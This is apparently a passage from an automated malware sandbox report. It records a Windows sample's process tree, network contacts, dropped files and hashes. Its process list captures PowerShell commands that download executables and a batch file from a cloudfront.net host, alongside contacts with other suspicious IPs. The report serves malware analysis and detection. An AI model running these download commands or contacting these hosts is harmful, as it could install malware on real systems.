PID 2668 wrote to memory of 3580 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\u224.3.exe
PID 4452 wrote to memory of 3400 N/A C:\Users\Admin\AppData\Local\Temp\u224.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 3580 wrote to memory of 1396 N/A C:\Users\Admin\AppData\Local\Temp\u224.3.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
PID 3580 wrote to memory of 1396 N/A C:\Users\Admin\AppData\Local\Temp\u224.3.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
PID 3400 wrote to memory of 1916 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 3400 wrote to memory of 1916 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 3400 wrote to memory of 1916 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 3400 wrote to memory of 1916 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 3400 wrote to memory of 1916 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Processes

C:\Users\Admin\AppData\Local\Temp\7ff9182009a077962d7c00b287caaa60fe7888e5d6cf6018c14f967a2441a3f9.exe

"C:\Users\Admin\AppData\Local\Temp\7ff9182009a077962d7c00b287caaa60fe7888e5d6cf6018c14f967a2441a3f9.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nso1C7D.tmp\lood.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/th.php?c=1000','stat')"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')"

C:\Users\Admin\AppData\Local\Temp\i1.exe

i1.exe /SUB=2838 /str=one

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=444', 'i2.bat')"

C:\Users\Admin\AppData\Local\Temp\u224.0.exe

"C:\Users\Admin\AppData\Local\Temp\u224.0.exe"

C:\Users\Admin\AppData\Local\Temp\u224.2\run.exe

"C:\Users\Admin\AppData\Local\Temp\u224.2\run.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=1667','i3.exe')"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Users\Admin\AppData\Local\Temp\u224.3.exe

"C:\Users\Admin\AppData\Local\Temp\u224.3.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2668 -ip 2668

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2668 -s 1212

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4256 --field-trial-handle=2252,i,16022092570067181109,3235558581947505669,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4260 --field-trial-handle=2252,i,16022092570067181109,3235558581947505669,262144 --variations-seed-version /prefetch:3

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4448 -ip 4448

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4448 -s 2000

Network

Country Destination Domain Proto
US 8.8.8.8:53 134.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 d68kcn56pzfb4.cloudfront.net udp
IT 108.138.198.104:443 d68kcn56pzfb4.cloudfront.net tcp
US 8.8.8.8:53 68.0.156.108.in-addr.arpa udp
US 8.8.8.8:53 104.198.138.108.in-addr.arpa udp
US 8.8.8.8:53 225.245.139.108.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
IT 108.138.198.104:443 d68kcn56pzfb4.cloudfront.net tcp
IT 108.138.198.104:443 d68kcn56pzfb4.cloudfront.net tcp
DE 185.172.128.59:80 185.172.128.59 tcp
DE 185.172.128.90:80 185.172.128.90 tcp
US 8.8.8.8:53 59.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 90.128.172.185.in-addr.arpa udp
DE 185.172.128.228:80 185.172.128.228 tcp
DE 185.172.128.59:80 185.172.128.59 tcp
IT 108.138.198.104:443 d68kcn56pzfb4.cloudfront.net tcp
US 8.8.8.8:53 240216234727901.mjj.xne26.cfd udp
BG 94.156.35.76:80 240216234727901.mjj.xne26.cfd tcp
US 8.8.8.8:53 228.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 note.padd.cn.com udp
RO 176.97.76.106:80 note.padd.cn.com tcp
US 8.8.8.8:53 76.35.156.94.in-addr.arpa udp
US 8.8.8.8:53 106.76.97.176.in-addr.arpa udp
DE 185.172.128.228:80 185.172.128.228 tcp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 svc.iolo.com udp
US 20.157.87.45:80 svc.iolo.com tcp
IT 108.138.198.104:443 d68kcn56pzfb4.cloudfront.net tcp
US 8.8.8.8:53 45.87.157.20.in-addr.arpa udp
US 8.8.8.8:53 24.139.73.23.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
DE 185.172.128.62:80 185.172.128.62 tcp
US 8.8.8.8:53 62.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 download.iolo.net udp
FR 143.244.56.51:443 download.iolo.net tcp
US 8.8.8.8:53 51.56.244.143.in-addr.arpa udp
US 20.157.87.45:80 svc.iolo.com tcp
RU 91.215.85.66:15647 tcp
US 8.8.8.8:53 66.85.215.91.in-addr.arpa udp
US 8.8.8.8:53 133.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.150:443 westus2-2.in.applicationinsights.azure.com tcp
US 8.8.8.8:53 150.155.9.20.in-addr.arpa udp
US 8.8.8.8:53 168.253.116.51.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\nso1C7D.tmp\INetC.dll

MD5 40d7eca32b2f4d29db98715dd45bfac5
SHA1 124df3f617f562e46095776454e1c0c7bb791cc7
SHA256 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9
SHA512 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d

C:\Users\Admin\AppData\Local\Temp\nso1C7D.tmp\lood.bat

MD5 75599c4a0c50b789c306880785ffa782
SHA1 31bb898b645b5616b2adf0a4718a9f24ce28e1c1
SHA256 fe26f8ca5512caeff7dffd12c2ffc11115850db0764a3ef9f943fa9f349e0a77
SHA512 b9ea2629a7f212aab59cb7a8bfdb684b1f23086b488b2a28b25784ad629c42dd8e71b4ef4927728df436a53c2f94d66013a166a407bcbc5dd6570c3b03fb31ad

memory/4556-16-0x0000000005070000-0x00000000050A6000-memory.dmp

memory/4556-17-0x00000000736A0000-0x0000000073E50000-memory.dmp

memory/4556-18-0x0000000005140000-0x0000000005150000-memory.dmp

memory/4556-19-0x0000000005140000-0x0000000005150000-memory.dmp

memory/4556-20-0x0000000005780000-0x0000000005DA8000-memory.dmp

memory/4556-21-0x0000000005680000-0x00000000056A2000-memory.dmp

memory/4556-23-0x0000000006000000-0x0000000006066000-memory.dmp

memory/4556-22-0x0000000005F90000-0x0000000005FF6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i1af2f5k.3bg.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4556-33-0x0000000006170000-0x00000000064C4000-memory.dmp

memory/4556-34-0x0000000006650000-0x000000000666E000-memory.dmp

memory/4556-35-0x00000000068A0000-0x00000000068EC000-memory.dmp

memory/4556-36-0x0000000007C60000-0x00000000082DA000-memory.dmp

memory/4556-37-0x0000000006B50000-0x0000000006B6A000-memory.dmp

memory/4556-40-0x00000000736A0000-0x0000000073E50000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 4280e36a29fa31c01e4d8b2ba726a0d8
SHA1 c485c2c9ce0a99747b18d899b71dfa9a64dabe32
SHA256 e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
SHA512 494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4

memory/2616-44-0x0000000004CF0000-0x0000000004D00000-memory.dmp

memory/2616-43-0x0000000004CF0000-0x0000000004D00000-memory.dmp

memory/2616-42-0x00000000736A0000-0x0000000073E50000-memory.dmp

memory/2616-50-0x0000000005B50000-0x0000000005EA4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 15c6586216ca0a9724ec03c109f30701
SHA1 b380c3ea4f650d45f5541e6023ff4b966f6e1705
SHA256 2fd157a560b72d7d1e86892eb33af81c2768ed488ddc4ada6388e61a025dbb6d
SHA512 3b1dadf3d6edeec6d16d2b5c69d1fbff7bc70f5fc7f9d314761cdeb8846ce3e67f9e063538d51190bed55ca566e2114b6fdb360d25711bf80c7123bbe8a4db73

memory/2616-58-0x00000000736A0000-0x0000000073E50000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\i1.exe

MD5 fdd3895eb388f733e4aabd00db54e6f7
SHA1 604978bd31d87066735e13343f26f80ce7f45706
SHA256 303ba93e0bb762a95859f5c94016e7cda0ace2fba811fb78e86af98baa2f3d01
SHA512 6b891f36976ec4f5bd8590215f191c43e93f69c19a83f2eab44ef5b2d17fbecc5531a05c2137c97164f0917bf5a0d41cb245760eb1544d83fa212d4a1d806756

memory/2464-72-0x0000000005A30000-0x0000000005D84000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 113f4ab700097ffc387c0f30ab90118a
SHA1 4e809d7789a8c456db5897258c540a66990121f0
SHA256 7b9b3b8e79ae6552ee21429a0366c7362ca60ead9d75c2c0dc56e9f65fa7d022
SHA512 c23bb859837bd8ef3891f34690f93ebee81f9e79d0d69e02dde575a659d85b2a4e3501e0602315d7eb301c2e2ff51537979d0da5c6bcd6d1962fe3476c61386f

memory/2464-74-0x00000000062B0000-0x00000000062FC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\u224.0.exe

MD5 f85ca7da4201921c93b98f6555f3d7b7
SHA1 523891e3e23bb45a52e402b6282f70f9e17cde9c
SHA256 eeaa177b0bc2d85cf8b416c2ed3b85fd50bd7c811bf41a32d161a10a767c2fda
SHA512 1b8220fe954799fbc43a702a1c508beff390c3f5a58e8e50e3c5ccce48459ec3a25df395f041f722cb67b0eb6c31013239f58a8b947e60344d15ce0c56e9cb17

C:\Users\Admin\AppData\Local\Temp\u224.1.zip

MD5 78d3ca6355c93c72b494bb6a498bf639
SHA1 2fa4e5df74bfe75c207c881a1b0d3bc1c62c8b0e
SHA256 a1dd547a63b256aa6a16871ed03f8b025226f7617e67b8817a08444df077b001
SHA512 1b2df7bee2514aee7efd3579f5dd33c76b40606d07dba69a34c45747662fad61174db4931bca02b058830107959205e889fee74f8ccc9f6e03f9fd111761f4ea

C:\Users\Admin\AppData\Local\Temp\u224.2\run.exe

MD5 9fb4770ced09aae3b437c1c6eb6d7334
SHA1 fe54b31b0db8665aa5b22bed147e8295afc88a03
SHA256 a05b592a971fe5011554013bcfe9a4aaf9cfc633bdd1fe3a8197f213d557b8d3
SHA512 140fee6daf23fe8b7e441b3b4de83554af804f00ecedc421907a385ac79a63164bd9f28b4be061c2ea2262755d85e14d3a8e7dc910547837b664d78d93667256

C:\Users\Admin\AppData\Local\Temp\u224.2\relay.dll

MD5 10d51becd0bbce0fab147ff9658c565e
SHA1 4689a18112ff876d3c066bc8c14a08fd6b7b7a4a
SHA256 7b2db9c88f60ed6dd24b1dec321a304564780fdb191a96ec35c051856128f1ed
SHA512 29faf493bb28f7842c905adc5312f31741effb09f841059b53d73b22aea2c4d41d73db10bbf37703d6aeb936ffacbc756a3cc85ba3c0b6a6863ef4d27fefcd29

C:\Users\Admin\AppData\Local\Temp\u224.2\whale.dbf

MD5 a723bf46048e0bfb15b8d77d7a648c3e
SHA1 8952d3c34e9341e4425571e10f22b782695bb915
SHA256 b440170853bdb43b66497f701aee2901080326975140b095a1669cb9dee13422
SHA512 ca8ea2f7f3c7af21b5673a0a3f2611b6580a7ed02efa2cfd8b343eb644ff09682bde43b25ef7aab68530d5ce31dcbd252c382dd336ecb610d4c4ebde78347273

memory/4752-175-0x0000000005A20000-0x0000000005D74000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\u224.2\bunch.dat

MD5 1e8237d3028ab52821d69099e0954f97
SHA1 30a6ae353adda0c471c6ed5b7a2458b07185abf2
SHA256 9387488f9d338e211be2cb45109bf590a5070180bc0d4a703f70d3cb3c4e1742
SHA512 a6406d7c18694ee014d59df581f1f76e980b68e3361ae680dc979606a423eba48d35e37f143154dd97fe5f066baf0ea51a2e9f8bc822d593e1cba70ead6559f3

memory/4452-180-0x000000006E790000-0x000000006E90B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3ccbfc8afb26a53589643ef468b8127a
SHA1 77a987c83c0154513499d717c25b5812a9c66a2a
SHA256 f788fdf36b53bdfc1a0d964ee739747fda5fcf4038c724f656bc0960c841eccc
SHA512 4317941dc0e895fe845e69128a7605a69b4a3236958474145c74021e49fc8d1a05502a96a430eda4689604dfb54fce66b416e9bb76dafa6d25a28d36ef093a82

C:\Users\Admin\AppData\Local\Temp\u224.2\UIxMarketPlugin.dll

MD5 d1ba9412e78bfc98074c5d724a1a87d6
SHA1 0572f98d78fb0b366b5a086c2a74cc68b771d368
SHA256 cbcea8f28d8916219d1e8b0a8ca2db17e338eb812431bc4ad0cb36c06fd67f15
SHA512 8765de36d3824b12c0a4478c31b985878d4811bd0e5b6fba4ea07f8c76340bd66a2da3490d4871b95d9a12f96efc25507dfd87f431de211664dbe9a9c914af6f

memory/4452-182-0x00007FFB09050000-0x00007FFB09245000-memory.dmp

memory/4752-191-0x00000000063C0000-0x000000000640C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\u224.3.exe

MD5 397926927bca55be4a77839b1c44de6e
SHA1 e10f3434ef3021c399dbba047832f02b3c898dbd
SHA256 4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7
SHA512 cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

memory/2668-197-0x0000000000400000-0x0000000001A3C000-memory.dmp

memory/4452-203-0x000000006E790000-0x000000006E90B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\3e193774

MD5 28d56f5cf7b335430250e4cd2c8577bd
SHA1 01b4adf6953bab2b7575acd8d79aff443806d82d
SHA256 713c8914e57abdba1be1084270d8f0fc1afc51d2588c290710a9adeb63ebc0ee
SHA512 7a555e6a092df2c21f0bf74eb904c2a064f9e763843561af62b8d319e330666f76089b94110400e2296a66d3c9c88017d6684e5af9b1f198f5ba57926b224d44

memory/3400-213-0x00007FFB09050000-0x00007FFB09245000-memory.dmp

memory/2668-214-0x0000000000400000-0x0000000001A3C000-memory.dmp

memory/3580-216-0x0000000000400000-0x00000000008AD000-memory.dmp

memory/4448-233-0x0000000061E00000-0x0000000061EF3000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

memory/4448-275-0x0000000000400000-0x000000000083A000-memory.dmp

memory/3580-291-0x0000000000400000-0x00000000008AD000-memory.dmp

memory/1396-295-0x0000014AC7650000-0x0000014ACAF48000-memory.dmp

memory/3400-299-0x000000006E790000-0x000000006E90B000-memory.dmp

C:\ProgramData\nss3.dll

MD5 1cc453cdf74f31e4d913ff9c10acdde2
SHA1 6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256 ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512 dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

C:\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

memory/4448-317-0x0000000000400000-0x000000000083A000-memory.dmp

memory/1396-318-0x0000014AE5820000-0x0000014AE5930000-memory.dmp

memory/1396-320-0x0000014ACCCF0000-0x0000014ACCCFC000-memory.dmp

memory/1396-319-0x0000014ACB3B0000-0x0000014ACB3C0000-memory.dmp

memory/1396-324-0x0000014ACCCE0000-0x0000014ACCCF4000-memory.dmp

memory/1396-326-0x0000014AE5430000-0x0000014AE5454000-memory.dmp

C:\ProgramData\Are.docx

MD5 a33e5b189842c5867f46566bdbf7a095
SHA1 e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA256 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512 f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\988345fa-2e28-4dd0-8895-aca43616f250.tmp

MD5 20d4b8fa017a12a108c87f540836e250
SHA1 1ac617fac131262b6d3ce1f52f5907e31d5f6f00
SHA256 6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d
SHA512 507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

memory/1916-332-0x0000000070D90000-0x0000000071FE4000-memory.dmp

memory/1396-340-0x0000014AE5460000-0x0000014AE546A000-memory.dmp

memory/1396-341-0x0000014AE5A70000-0x0000014AE5B22000-memory.dmp

memory/1396-342-0x0000014AE5470000-0x0000014AE549A000-memory.dmp

memory/1396-343-0x0000014AE5B20000-0x0000014AE5B9A000-memory.dmp

memory/1396-344-0x0000014AE54C0000-0x0000014AE5522000-memory.dmp

memory/1396-345-0x0000014AE5C20000-0x0000014AE5C96000-memory.dmp

memory/1396-346-0x0000014ACB3D0000-0x0000014ACB3DA000-memory.dmp

memory/1396-350-0x0000014AE5CA0000-0x0000014AE5FA0000-memory.dmp

memory/4448-352-0x0000000000400000-0x000000000083A000-memory.dmp

memory/1916-353-0x0000000001300000-0x00000000013C6000-memory.dmp

memory/1916-354-0x0000000005870000-0x0000000005902000-memory.dmp

memory/1916-355-0x0000000005EC0000-0x0000000006464000-memory.dmp

memory/1916-356-0x0000000005AE0000-0x0000000005CA2000-memory.dmp

memory/1916-357-0x0000000005990000-0x0000000005A06000-memory.dmp

memory/1396-358-0x0000014AE9B50000-0x0000014AE9B58000-memory.dmp

memory/1916-359-0x0000000005A10000-0x0000000005A60000-memory.dmp

memory/1916-360-0x0000000005810000-0x000000000581A000-memory.dmp

memory/1396-361-0x0000014AE9FE0000-0x0000014AEA018000-memory.dmp

memory/1396-362-0x0000014AE9FA0000-0x0000014AE9FAE000-memory.dmp

memory/1916-363-0x0000000006AA0000-0x0000000006FCC000-memory.dmp

memory/1916-364-0x00000000065B0000-0x00000000065CE000-memory.dmp

memory/1396-366-0x0000014AEB130000-0x0000014AEB152000-memory.dmp

memory/1396-365-0x0000014AEA060000-0x0000014AEA06A000-memory.dmp

memory/1396-367-0x0000014AEB680000-0x0000014AEBBA8000-memory.dmp

memory/1396-370-0x0000014AEA700000-0x0000014AEA750000-memory.dmp

memory/1396-371-0x0000014AEA6B0000-0x0000014AEA6BC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp1024.tmp

MD5 c9ff7748d8fcef4cf84a5501e996a641
SHA1 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA256 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512 d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

C:\Users\Admin\AppData\Local\Temp\tmp1075.tmp

MD5 91dbaf73c1a8c55254d90272f998e412
SHA1 2b86b31c8c00c937291e5ac3b1d134a5df959acf
SHA256 0628922305d2478ba75a48efadf932d439616eaf1ff908be334793f7bde28107
SHA512 109f4f59616cc1d1682b4d9468804f7668c77ce1878afec06a57037193f31a9c1c39f5d269277462936373b129d26488cddcc34d455c27185534e7754baaa988

memory/1396-390-0x0000014AEA750000-0x0000014AEA772000-memory.dmp

memory/1396-391-0x0000014AEA780000-0x0000014AEA79E000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-04-28 01:21

Reported

2024-04-28 01:24

Platform

win7-20240220-en

Max time kernel

118s

Max time network

119s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

Signatures

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 236

Network

N/A

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-04-28 01:21

Reported

2024-04-28 01:24

Platform

win10v2004-20240226-en

Max time kernel

144s

Max time network

154s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1756 wrote to memory of 4504 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1756 wrote to memory of 4504 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1756 wrote to memory of 4504 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 4504 -ip 4504

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4504 -s 624

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4112 --field-trial-handle=2292,i,2103142837140538807,15881446839139365070,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 79.121.231.20.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 13.107.253.64:443 tcp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 133.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
GB 142.250.179.234:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 234.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 175.117.168.52.in-addr.arpa udp

Files

N/A